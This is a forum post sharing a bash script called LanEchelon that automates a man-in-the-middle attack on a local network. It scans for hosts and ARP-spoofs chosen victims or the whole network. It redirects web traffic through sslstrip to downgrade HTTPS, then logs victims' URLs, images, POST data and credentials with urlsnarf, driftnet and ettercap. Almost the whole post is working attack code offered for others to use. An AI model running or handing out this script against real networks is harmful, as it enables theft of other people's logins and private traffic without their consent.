Hi all

I decided to translate (my language is Polish) and put my script LanEchelon.

LanEchelon sniff: Traffic et al. pcap, url, images, post, post ssl.

Sorts the results in the logs.

It also has a scanner hosts.

Requirements:

Arpspoof - Package dsniff
SSlStrip
Driftnet
Ethercap
Tshark
ARP-Scan (old version in the repo, new - http://www.nta-monitor.com/tools/arp-scan/)

Code:
#!/bin/bash
#Do zrobienia:
function pcap {
if [ $NET = "yes" ] ; then
sleep 1
elif [ $NET = "no" ] ; then
	for x in $CEL ; do
	tshark -r /root/$SESJA/*.cap -R "ip.addr == $x" -b filesize:92160 -w /root/$SESJA/$SESJA-$x.pcap
	done
	rm /root/$SESJA/*.cap
fi
}
function listaurl {
if [ $NET = "yes" ] ; then
grep -v $MOJEIP /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url.txt
elif [ $NET = "no" ] ; then
	for x in $CEL ; do
	grep $x /root/$SESJA/$SESJA.txt > /root/$SESJA/$SESJA-url-$x.txt
	done
fi
rm /root/$SESJA/$SESJA.txt
}
function skanhost {
echo
arp-scan -l -I $IFEJS | grep -v $BRAMA | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/&/g' | cut -f 1,2,3,4 > /root/host.list
if [[ -s host.list ]] ; then
        echo -e "\e[01;33m[!]\e[00m List of active hosts \e[02;37m(IP,MAC,CARD MANUFACTURERJ)\e[00m:"
        echo
        echo ----------------------------------------------------------------------------
        echo -e "\e[1;32m`cat /root/host.list`\e[00m"
        echo ----------------------------------------------------------------------------
        echo
else
        echo
        echo -e "\e[01;33m[!]\e[00m There are no active hosts..."
        echo
fi
}
function ipinfo {
MOJEIP=`ifconfig $IFEJS | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
MASKA=`ifconfig $IFEJS | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
BRAMA=`route -n | grep $IFEJS | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
echo
echo -e "\e[01;33m[!]\e[00m Data network interface \e[01;34m$IFEJS\e[00m:"
echo
echo -e "\e[02;35m        GATEWAY: \e[00m$BRAMA"
echo -e "\e[02;35m        YOUR IP: \e[00m$MOJEIP"
echo -e "\e[02;35m    SUBNET MASK: \e[00m$MASKA"
echo
}
clear
echo
echo ----------------------------------------------------------
echo -e "|        @?$\e[01;38m>>>>>>>\e[00m}LanEchelon  Script{\e[01;38m<<<<<<<\e[00m@?$        |"
echo ----------------------------------------------------------
echo -e "|  \e[02;37msniff: traffic in .pcap, url, images, post, ssl post\e[00m  |"
echo ----------------------------------------------------------
echo -e "|            autor: \e[01;34mnum3r\e[00m        version: \e[01;34m1.0\e[00m            |"
echo ----------------------------------------------------------
echo
echo
echo -e "\e[01;32m[+]\e[00m Starting procedure..."
echo
echo
echo -ne "\e[01;38m[>]\e[00m Please enter a name for the session: "
read -e SESJA
echo -ne "\e[01;34m[>]\e[00m Save the entire network traffic in .pcap?? (yes/no): "
read -e RUCH
echo -ne "\e[01;38m[>]\e[00m Save the captured images?? (yes/no): "
read -e GRAFIKA
echo -ne "\e[01;34m[>]\e[00m Enable option to two-way ARPspoofing?? (yes/no): "
read -e ARP
echo -ne "\e[01;38m[>]\e[00m Enter the name of the network interface, np. wlan0: "
read -e IFEJS
ipinfo
echo -ne "\e[01;34m[>]\e[00m Start scanning active hosts on the network?? (yes/no): "
read -e SKAN
if [ $SKAN = "yes" ] ; then
skanhost
fi
echo -ne "\e[01;38m[>]\e[00m Attack the whole network?? (tak/nie): "
read -e NET
if [ $NET = "yes" ] ; then
sleep 1
else
echo -ne "\e[01;34m[>]\e[00m Enter the IP address(-es) of the victim(-s) (separate space): "
read -e CEL
fi
echo
echo
echo -e "\e[01;32m[+]\e[00m Starting attack...(press q to exit the script)"
sleep 2
echo
mkdir /root/$SESJA/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "1" > /proc/sys/net/ipv4/ip_forward
sslstrip -p -f -k -w /root/$SESJA/$SESJA-ssl.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1
urlsnarf -i $IFEJS | grep http > /root/$SESJA/$SESJA.txt &
sleep 1
xterm -geometry 105x15+1+1 -bg black -fg green -T "SSL Log" -s -sb -si +sk -sl 5000 -e tail -f /root/$SESJA/$SESJA-ssl.log &
if [ $GRAFIKA = "yes" ] ; then
mkdir /root/$SESJA/images/
xterm -geometry 75x15+650+1 -bg black -fg blue -T "Images" -s -sb -si +sk -sl 5000 -e driftnet -i $IFEJS -p -a -d /root/$SESJA/images &
sleep 1
else
sleep 1
fi
if [ $NET = "yes" ] && [ $RUCH = "yes" ]; then
xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA &
sleep 1
ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA
elif [ $NET = "yes" ] && [ $RUCH = "no" ]; then
xterm -geometry 100x5+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS $BRAMA &
sleep 1
ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA
fi
for x in $CEL ; do
  if [ $NET = "yes" ] && [ $ARP = "no" ]; then
  xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA &
  sleep 1
  xterm -geometry 100x6+1+605 -bg black -fg yellow -T "ARPspoof 2" -e arpspoof -i $IFEJS -t $BRAMA $x &
  sleep 1
  elif [ $NET = "no" ] && [ $ARP = "no" ]; then
  xterm -geometry 100x6+1+500 -bg black -fg red -T "ARPspoof" -e arpspoof -i $IFEJS -t $x $BRAMA &
  sleep 1
  fi
done
if [ $NET = "no" ] && [ $RUCH = "yes" ]; then
ettercap -T -q -u -z -i $IFEJS -w /root/$SESJA/$SESJA.cap -c -l /root/$SESJA/$SESJA
elif [ $NET = "no" ] && [ $RUCH = "yes" ]; then
ettercap -T -q -u -z -i $IFEJS -c -l /root/$SESJA/$SESJA
fi
echo
echo -e "\e[01;32m[+]\e[00m Stopping attack..."
echo
killall -q -w arpspoof
killall -q -w xterm
killall -q -w sslstrip
killall -q -w urlsnarf
killall -q driftnet
killall -q -w python
listaurl
if [ $RUCH = "yes" ] ; then
pcap
else
sleep 1
fi
rm /root/host.list
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "0" > /proc/sys/net/ipv4/ip_forward
echo
echo
echo -e "\e[01;32m[+]\e[00m Procedure completed..."
echo -e "\e[01;32m[+]\e[00m See you later..."
echo
exit
Maybe someone will like it.

Best Regards